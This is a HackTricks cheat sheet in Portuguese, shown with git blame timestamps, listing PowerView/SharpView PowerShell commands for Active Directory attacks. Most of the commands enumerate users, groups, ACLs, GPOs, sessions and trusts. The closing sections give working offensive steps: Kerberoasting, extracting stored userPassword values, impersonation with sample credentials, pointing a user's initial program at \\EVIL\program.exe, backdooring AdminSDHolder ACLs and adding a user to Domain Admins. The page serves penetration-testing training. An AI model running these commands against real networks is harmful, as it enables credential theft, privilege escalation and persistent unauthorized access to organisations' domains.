2022-08-13 13:54:19 +00:00
# PowerView/SharpView
2022-04-28 16:01:33 +00:00
2024-07-19 03:59:20 +00:00
{% hint style="success" %}
Aprenda e pratique Hacking AWS:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Aprenda e pratique Hacking GCP: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
< details >
2024-07-19 03:59:20 +00:00
< summary > Support HackTricks< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 03:59:20 +00:00
* Confira os [**planos de assinatura** ](https://github.com/sponsors/carlospolop )!
* **Junte-se ao** 💬 [**grupo do Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo do telegram** ](https://t.me/peass ) ou **siga** -nos no **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repositórios do github.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 03:59:20 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-05-02 15:04:03 +00:00
< figure > < img src = "https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt = "" > < figcaption > < / figcaption > < / figure >
2024-04-07 22:57:51 +00:00
{% embed url="https://websec.nl/" %}
2024-07-19 03:59:20 +00:00
A versão mais atualizada do PowerView estará sempre no branch dev do PowerSploit: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 ](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 )
2020-07-15 15:43:14 +00:00
2024-02-07 04:39:38 +00:00
[**SharpView** ](https://github.com/tevora-threat/SharpView ) é uma porta .NET do [**PowerView** ](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 )
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
### Enumeração rápida
2022-10-05 23:14:39 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-NetDomain #Basic domain info
#User info
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled info
Get-NetUser -LDAPFilter '(sidHistory=*)' #Find users with sidHistory set
Get-NetUser -PreauthNotRequired #ASREPRoastable users
Get-NetUser -SPN #Kerberoastable users
#Groups info
Get-NetGroup | select samaccountname, admincount, description
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=EGOTISTICAL-BANK,DC=local' | %{ $_.SecurityIdentifier } | Convert-SidToName #Get AdminSDHolders
#Computers
Get-NetComputer | select samaccountname, operatingsystem
2022-09-03 23:59:35 +00:00
Get-NetComputer -Unconstrainusered | select samaccountname #DCs always appear but aren't useful for privesc
2021-01-03 18:16:51 +00:00
Get-NetComputer -TrustedToAuth | select samaccountname #Find computers with Constrained Delegation
2020-07-15 15:43:14 +00:00
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups
#Shares
Find-DomainShare -CheckShareAccess #Search readable shares
#Domain trusts
Get-NetDomainTrust #Get all domain trusts (parent, children and external)
Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
#LHF
#Check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
#Asks DC for all computers, and asks every compute if it has admin access (very noisy). You need RCP and SMB ports opened.
Find-LocalAdminAccess
#Get members from Domain Admins (default) and a list of computers and check if any of the users is logged in any machine running Get-NetSession/Get-NetLoggedon on each host. If -Checkaccess, then it also check for LocalAdmin access in the hosts.
Invoke-UserHunter -CheckAccess
#Find interesting ACLs
Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, ActiveDirectoryRights | fl
```
2024-07-19 03:59:20 +00:00
### Informações do domínio
2022-10-05 23:14:39 +00:00
```powershell
2020-07-15 15:43:14 +00:00
# Domain Info
2022-08-13 12:32:53 +00:00
Get-Domain #Get info about the current domain
2020-07-15 15:43:14 +00:00
Get-NetDomain #Get info about the current domain
Get-NetDomain -Domain mydomain.local
Get-DomainSID #Get domain SID
2022-05-01 12:49:36 +00:00
# Policy
2020-07-15 15:43:14 +00:00
Get-DomainPolicy #Get info about the policy
(Get-DomainPolicy)."KerberosPolicy" #Kerberos tickets info(MaxServiceAge)
2020-11-10 15:28:47 +00:00
(Get-DomainPolicy)."SystemAccess" #Password policy
2022-08-13 12:32:53 +00:00
Get-DomainPolicyData | select -ExpandProperty SystemAccess #Same as previous
2020-07-15 15:43:14 +00:00
(Get-DomainPolicy).PrivilegeRights #Check your privileges
2022-08-13 12:32:53 +00:00
Get-DomainPolicyData # Same as Get-DomainPolicy
2020-07-15 15:43:14 +00:00
2022-05-01 12:49:36 +00:00
# Domain Controller
2022-08-13 12:32:53 +00:00
Get-DomainController | select Forest, Domain, IPAddress, Name, OSVersion | fl # Get specific info of current domain controller
Get-NetDomainController -Domain mydomain.local #Get all ifo of specific domain Domain Controller
2024-01-04 09:05:34 +00:00
# Get Forest info
2022-08-13 12:32:53 +00:00
Get-ForestDomain
2020-07-15 15:43:14 +00:00
```
2024-07-19 03:59:20 +00:00
### Usuários, Grupos, Computadores e OUs
2022-10-05 23:14:39 +00:00
```powershell
2020-07-15 15:43:14 +00:00
# Users
2022-08-13 13:54:19 +00:00
## Get usernames and their groups
Get-DomainUser -Properties name, MemberOf | fl
## Get-DomainUser and Get-NetUser are kind of the same
2020-07-15 15:43:14 +00:00
Get-NetUser #Get users with several (not all) properties
2022-09-03 17:33:08 +00:00
Get-NetUser | select samaccountname, description, pwdlastset, logoncount, badpwdcount #List all usernames
2020-07-15 15:43:14 +00:00
Get-NetUser -UserName student107 #Get info about a user
Get-NetUser -properties name, description #Get all descriptions
Get-NetUser -properties name, pwdlastset, logoncount, badpwdcount #Get all pwdlastset, logoncount and badpwdcount
Find-UserField -SearchField Description -SearchTerm "built" #Search account with "something" in a parameter
2022-10-05 20:40:19 +00:00
# Get users with reversible encryption (PWD in clear text with dcsync)
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
2020-07-15 15:43:14 +00:00
2022-05-01 12:49:36 +00:00
# Users Filters
2020-07-15 15:43:14 +00:00
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE -properties distinguishedname #All enabled users
Get-NetUser -UACFilter ACCOUNTDISABLE #All disabled users
Get-NetUser -UACFilter SMARTCARD_REQUIRED #Users that require a smart card
Get-NetUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname #Not smart card users
Get-NetUser -LDAPFilter '(sidHistory=*)' #Find users with sidHistory set
Get-NetUser -PreauthNotRequired #ASREPRoastable users
Get-NetUser -SPN | select serviceprincipalname #Kerberoastable users
Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'} #Domain admins kerberostable
2022-09-03 23:59:35 +00:00
Get-Netuser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto #Constrained Resource Delegation
2020-07-15 15:43:14 +00:00
Get-NetUser -AllowDelegation -AdminCount #All privileged users that aren't marked as sensitive/not for delegation
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
2024-01-04 09:05:34 +00:00
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
2020-07-15 15:43:14 +00:00
}
2022-10-05 23:14:39 +00:00
# Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy
## Users with this flag might have empty passwords (if allowed) or shorter passwords
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
2020-07-15 15:43:14 +00:00
#Groups
2022-08-13 13:54:19 +00:00
Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName
2024-01-04 09:05:34 +00:00
## Get-DomainGroup is similar to Get-NetGroup
2020-07-15 15:43:14 +00:00
Get-NetGroup #Get groups
Get-NetGroup -Domain mydomain.local #Get groups of an specific domain
Get-NetGroup 'Domain Admins' #Get all data of a group
2022-09-03 23:59:35 +00:00
Get-NetGroup -AdminCount | select name,memberof,admincount,member | fl #Search admin grups
2020-07-15 15:43:14 +00:00
Get-NetGroup -UserName "myusername" #Get groups of a user
Get-NetGroupMember -Identity "Administrators" -Recurse #Get users inside "Administrators" group. If there are groups inside of this grup, the -Recurse option will print the users inside the others groups also
Get-NetGroupMember -Identity "Enterprise Admins" -Domain mydomain.local #Remember that "Enterprise Admins" group only exists in the rootdomain of the forest
Get-NetLocalGroup -ComputerName dc.mydomain.local -ListGroups #Get Local groups of a machine (you need admin rights in no DC hosts)
Get-NetLocalGroupMember -computername dcorp-dc.dollarcorp.moneycorp.local #Get users of localgroups in computer
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs #Check AdminSDHolder users
2022-10-05 00:42:02 +00:00
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} #Get ObjectACLs by sid
2020-07-15 15:43:14 +00:00
Get-NetGPOGroup #Get restricted groups
# Computers
2022-08-13 13:54:19 +00:00
Get-DomainComputer -Properties DnsHostName # Get all domain maes of computers
## Get-DomainComputer is kind of the same as Get-NetComputer
2020-07-15 15:43:14 +00:00
Get-NetComputer #Get all computer objects
Get-NetComputer -Ping #Send a ping to check if the computers are working
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
Get-NetComputer -TrustedToAuth #Find computers with Constrined Delegation
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups
2022-08-13 13:54:19 +00:00
#OU
Get-DomainOU -Properties Name | sort -Property Name #Get names of OUs
Get-DomainOU "Servers" | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties Name} #Get all computers inside an OU (Servers in this case)
## Get-DomainOU is kind of the same as Get-NetOU
Get-NetOU #Get Organization Units
Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)
2020-07-15 15:43:14 +00:00
```
2024-07-19 03:59:20 +00:00
### Logon e Sessões
2022-10-05 23:14:39 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-NetLoggedon -ComputerName < servername > #Get net logon users at the moment in a computer (need admins rights on target)
Get-NetSession -ComputerName < servername > #Get active sessions on the host
Get-LoggedOnLocal -ComputerName < servername > #Get locally logon users at the moment (need remote registry (default in server OS))
Get-LastLoggedon -ComputerName < servername > #Get last user logged on (needs admin rigths in host)
Get-NetRDPSession -ComputerName < servername > #List RDP sessions inside a host (needs admin rights in host)
```
2024-07-19 03:59:20 +00:00
### Group Policy Object - GPOs
2020-07-15 15:43:14 +00:00
2024-07-19 03:59:20 +00:00
Se um atacante tiver **altos privilégios sobre um GPO** , ele poderá **elevar privilégios** abusando disso ao **adicionar permissões a um usuário** , **adicionar um usuário administrador local** a um host ou **criar uma tarefa agendada** (imediata) para realizar uma ação.\
2024-02-07 04:39:38 +00:00
Para [**mais informações sobre isso e como abusar disso, siga este link** ](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation ).
2022-10-05 23:14:39 +00:00
```powershell
2020-07-15 15:43:14 +00:00
#GPO
2022-10-05 23:14:39 +00:00
Get-DomainGPO | select displayName #Check the names for info
2020-07-15 15:43:14 +00:00
Get-NetGPO #Get all policies with details
Get-NetGPO | select displayname #Get the names of the policies
Get-NetGPO -ComputerName < servername > #Get the policy applied in a computer
gpresult /V #Get current policy
2022-08-15 11:03:10 +00:00
# Get who can create new GPOs
2022-10-05 00:42:02 +00:00
Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=invented,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
2022-08-15 11:03:10 +00:00
# Enumerate permissions for GPOs where users with RIDs of > 1000 have some kind of modification/control rights
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
2022-10-05 23:14:39 +00:00
# Get permissions a user/group has over any GPO
$sid=Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
# COnvert GPO GUID to name
Get-GPO -Guid 18E5A689-E67F-90B2-1953-198ED4A7F532
2022-08-15 11:03:10 +00:00
# Transform SID to name
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1126
# Get GPO of an OU
Get-NetGPO -GPOName '{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}'
2022-08-13 13:54:19 +00:00
# Returns all GPOs that modify local group memberships through Restricted Groups or Group Policy Preferences.
Get-DomainGPOLocalGroup | select GPODisplayName, GroupName, GPOType
2022-08-15 11:03:10 +00:00
2022-08-13 13:54:19 +00:00
# Enumerates the machines where a specific domain user/group is a member of a specific local group.
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName
2020-07-15 15:43:14 +00:00
```
2024-07-19 03:59:20 +00:00
Aprenda como **explorar permissões sobre GPOs e ACLs** em:
2022-08-15 11:03:10 +00:00
2022-10-10 21:08:59 +00:00
{% content-ref url="../active-directory-methodology/acl-persistence-abuse/" %}
[acl-persistence-abuse ](../active-directory-methodology/acl-persistence-abuse/ )
2022-08-15 11:03:10 +00:00
{% endcontent-ref %}
2022-08-13 12:32:53 +00:00
### ACL
2022-10-05 23:14:39 +00:00
```powershell
2022-10-05 20:40:19 +00:00
#Get ACLs of an object (permissions of other objects over the indicated one)
Get-ObjectAcl -SamAccountName < username > -ResolveGUIDs
#Other way to get ACLs of an object
$sid = Convert-NameToSid < username / group >
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
#Get permissions of a file
Get-PathAcl -Path "\\dc.mydomain.local\sysvol"
#Find intresting ACEs (Interesting permisions of "unexpected objects" (RID>1000 and modify permissions) over other objects
Find-InterestingDomainAcl -ResolveGUIDs
#Check if any of the interesting permissions founds is realated to a username/group
2024-01-04 09:05:34 +00:00
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"}
2022-10-05 20:40:19 +00:00
#Get special rights over All administrators in domain
Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights
2020-07-15 15:43:14 +00:00
```
2024-02-07 04:39:38 +00:00
### Arquivos e pastas compartilhados
2022-10-05 23:14:39 +00:00
```powershell
2022-08-15 11:03:10 +00:00
Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
Find-DomainShare -CheckShareAccess #Search readable shares
Find-InterestingDomainShareFile #Find interesting files, can use filters
```
2023-06-06 18:56:34 +00:00
### Confiança de Domínio
2022-10-05 23:14:39 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-NetDomainTrust #Get all domain trusts (parent, children and external)
2022-08-13 13:54:19 +00:00
Get-DomainTrust #Same
2020-07-15 15:43:14 +00:00
Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
Get-DomainTrustMapping #Enumerate also all the trusts
2022-08-13 12:32:53 +00:00
Get-ForestDomain # Get basic forest info
2020-07-15 15:43:14 +00:00
Get-ForestGlobalCatalog #Get info of current forest (no external)
Get-ForestGlobalCatalog -Forest external.domain #Get info about the external forest (if possible)
2024-01-04 09:05:34 +00:00
Get-DomainTrust -SearchBase "GC://$($ENV:USERDNSDOMAIN)"
2020-07-15 15:43:14 +00:00
Get-NetForestTrust #Get forest trusts (it must be between 2 roots, trust between a child and a root is just an external trust)
Get-DomainForeingUser #Get users with privileges in other domains inside the forest
Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest
```
2024-07-19 03:59:20 +00:00
### L**ow**-**hanging fruit**
2022-10-05 23:14:39 +00:00
```powershell
2020-07-15 15:43:14 +00:00
#Check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
2022-08-13 13:54:19 +00:00
2020-07-15 15:43:14 +00:00
#Asks DC for all computers, and asks every compute if it has admin access (very noisy). You need RCP and SMB ports opened.
Find-LocalAdminAccess
2022-08-13 13:54:19 +00:00
2020-07-15 15:43:14 +00:00
#(This time you need to give the list of computers in the domain) Do the same as before but trying to execute a WMI action in each computer (admin privs are needed to do so). Useful if RCP and SMB ports are closed.
.\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt
2022-08-13 13:54:19 +00:00
2020-07-15 15:43:14 +00:00
#Enumerate machines where a particular user/group identity has local admin rights
Get-DomainGPOUserLocalGroupMapping -Identity < User / Group >
2022-08-13 13:54:19 +00:00
# Enumerates the members of specified local group (default administrators)
# for all the targeted machines on the current (or specified) domain.
2020-07-15 15:43:14 +00:00
Invoke-EnumerateLocalAdmin
2022-08-13 13:54:19 +00:00
Find-DomainLocalGroupMember
2020-07-15 15:43:14 +00:00
#Search unconstrained delegation computers and show users
Find-DomainUserLocation -ComputerUnconstrained -ShowAll
2022-08-13 13:54:19 +00:00
2020-07-15 15:43:14 +00:00
#Admin users that allow delegation, logged into servers that allow unconstrained delegation
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
2022-08-13 13:54:19 +00:00
#Get members from Domain Admins (default) and a list of computers
# and check if any of the users is logged in any machine running Get-NetSession/Get-NetLoggedon on each host.
# If -Checkaccess, then it also check for LocalAdmin access in the hosts.
## By default users inside Domain Admins are searched
Find-DomainUserLocation [-CheckAccess] | select UserName, SessionFromName
2020-07-15 15:43:14 +00:00
Invoke-UserHunter [-CheckAccess]
2022-08-13 13:54:19 +00:00
2020-07-15 15:43:14 +00:00
#Search "RDPUsers" users
Invoke-UserHunter -GroupName "RDPUsers"
2022-08-13 13:54:19 +00:00
2020-07-15 15:43:14 +00:00
#It will only search for active users inside high traffic servers (DC, File Servers and Distributed File servers)
Invoke-UserHunter -Stealth
```
2024-01-04 09:05:34 +00:00
### Objetos excluídos
2022-10-05 23:14:39 +00:00
```powershell
2020-07-15 15:43:14 +00:00
#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
#You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
```
2024-07-19 03:59:20 +00:00
### MISC
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
#### SID para Nome
2022-10-05 23:14:39 +00:00
```powershell
2020-07-15 15:43:14 +00:00
"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
```
2022-08-13 12:32:53 +00:00
#### Kerberoast
2022-10-05 23:14:39 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
```
2024-07-19 03:59:20 +00:00
#### Use diferentes credenciais (argumento)
2022-10-05 23:14:39 +00:00
```powershell
2020-07-15 15:43:14 +00:00
# use an alterate creadential for any function
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred
```
2024-07-19 03:59:20 +00:00
#### Impersonar um usuário
2022-10-05 23:14:39 +00:00
```powershell
2020-07-15 15:43:14 +00:00
# if running in -sta mode, impersonate another credential a la "runas /netonly"
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Invoke-UserImpersonation -Credential $Cred
# ... action
Invoke-RevertToSelf
```
2023-06-06 18:56:34 +00:00
#### Definir valores
2022-10-05 23:14:39 +00:00
```powershell
2020-07-15 15:43:14 +00:00
# set the specified property for the given user identity
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
# Set the owner of 'dfm' in the current domain to 'harmj0y'
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
2024-01-04 09:05:34 +00:00
# Backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
2020-07-15 15:43:14 +00:00
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
# Add user to 'Domain Admins'
Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local
```
2024-05-02 15:04:03 +00:00
< figure > < img src = "https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt = "" > < figcaption > < / figcaption > < / figure >
2024-04-07 22:57:51 +00:00
{% embed url="https://websec.nl/" %}
2024-07-19 03:59:20 +00:00
{% hint style="success" %}
Aprenda e pratique Hacking AWS:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Aprenda e pratique Hacking GCP: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
< details >
2024-07-19 03:59:20 +00:00
< summary > Support HackTricks< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 03:59:20 +00:00
* Confira os [**planos de assinatura** ](https://github.com/sponsors/carlospolop )!
* **Junte-se ao** 💬 [**grupo do Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo do telegram** ](https://t.me/peass ) ou **siga** -nos no **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 03:59:20 +00:00
{% endhint %}